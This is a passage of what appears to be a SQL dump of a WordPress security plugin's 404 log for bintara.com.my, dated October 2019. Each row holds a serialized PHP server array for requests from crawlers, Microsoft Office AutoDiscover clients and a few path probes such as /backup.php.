07:03:30',35056688,36862600,'https://bintara.com.my/backup.php',1,0,'50.31.134.21'),(27660,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"219.93.16.183\";s:11:\"REMOTE_PORT\";s:5:\"40347\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZwl5gNc2mm-mpSb7y2EGAAAAdU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570514406.8709\";s:12:\"REQUEST_TIME\";s:10:\"1570514406\";}}','notice','2019-10-08 06:00:10','2019-10-08 06:00:07',35502952,37302664,'https://bintara.com.my/?page_id=18',1,0,'219.93.16.183'),(27659,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"//dsds\";s:14:\"CONTENT_LENGTH\";s:3:\"349\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:27:\"http://bintara.com.my//dsds\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"http://bintara.com.my/dsds\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/dsds\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZwcGANc2mm-mpSb7y1-UQAAAc0\";s:12:\"REDIRECT_URL\";s:5:\"/dsds\";s:11:\"REMOTE_ADDR\";s:13:\"182.32.65.220\";s:11:\"REMOTE_PORT\";s:5:\"52005\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"http://bintara.com.my/dsds\";s:10:\"SCRIPT_URL\";s:5:\"/dsds\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZwcGANc2mm-mpSb7y1-UQAAAc0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570511897.0791\";s:12:\"REQUEST_TIME\";s:10:\"1570511897\";}}','notice','2019-10-08 05:18:18','2019-10-08 05:18:17',35422512,37221792,'http://bintara.com.my//dsds',1,0,'182.32.65.220'),(27658,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZv7twNc2mm-mpSb7y1rPgAAAdM\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.108\";s:11:\"REMOTE_PORT\";s:5:\"15758\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZv7twNc2mm-mpSb7y1rPgAAAdM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570503607.541\";s:12:\"REQUEST_TIME\";s:10:\"1570503607\";}}','notice','2019-10-08 03:00:10','2019-10-08 03:00:08',33982920,35788976,'https://bintara.com.my/toughbook-31/',1,0,'157.55.39.108'),(27657,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"70-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E20E13C8-85C0-4D2D-BCC8-770D678DDA7D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"70-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZvi5SETv06qdACZfD2dHwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"49716\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZvi5SETv06qdACZfD2dHwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570497253.3745\";s:12:\"REQUEST_TIME\";s:10:\"1570497253\";}}','notice','2019-10-08 01:14:16','2019-10-08 01:14:13',35899640,37701928,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27656,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"DAE62901-FC5B-4668-8361-2DE677510EB8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZve1gLlPPpMaW01YR3DqwAAABY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"50244\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZve1gLlPPpMaW01YR3DqwAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570496214.4695\";s:12:\"REQUEST_TIME\";s:10:\"1570496214\";}}','notice','2019-10-08 00:56:57','2019-10-08 00:56:54',35789088,37584808,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27655,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C879DBE5-5795-4DC5-91A1-1B80BBB84D72\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZvdNG4e25i9wxupbG-auAAAAUA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"49604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZvdNG4e25i9wxupbG-auAAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570495796.7789\";s:12:\"REQUEST_TIME\";s:10:\"1570495796\";}}','notice','2019-10-08 00:49:59','2019-10-08 00:49:57',35785288,37593736,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27654,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B4157B0C-FBB6-4CE8-A50B-D8B12F738010\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZva024e25i9wxupbG-Z4gAAAUc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"62794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZva024e25i9wxupbG-Z4gAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570495187.6853\";s:12:\"REQUEST_TIME\";s:10:\"1570495187\";}}','notice','2019-10-08 00:39:50','2019-10-08 00:39:48',35391088,37187328,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27653,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B4B5FA26-31A2-4789-82FE-F170150456A2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZvY3u-G7aXnWSExXLtaaAAAAJQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.236\";s:11:\"REMOTE_PORT\";s:5:\"49353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZvY3u-G7aXnWSExXLtaaAAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570494687.2422\";s:12:\"REQUEST_TIME\";s:10:\"1570494687\";}}','notice','2019-10-08 00:31:35','2019-10-08 00:31:27',35785032,37588432,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.236'),(27652,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 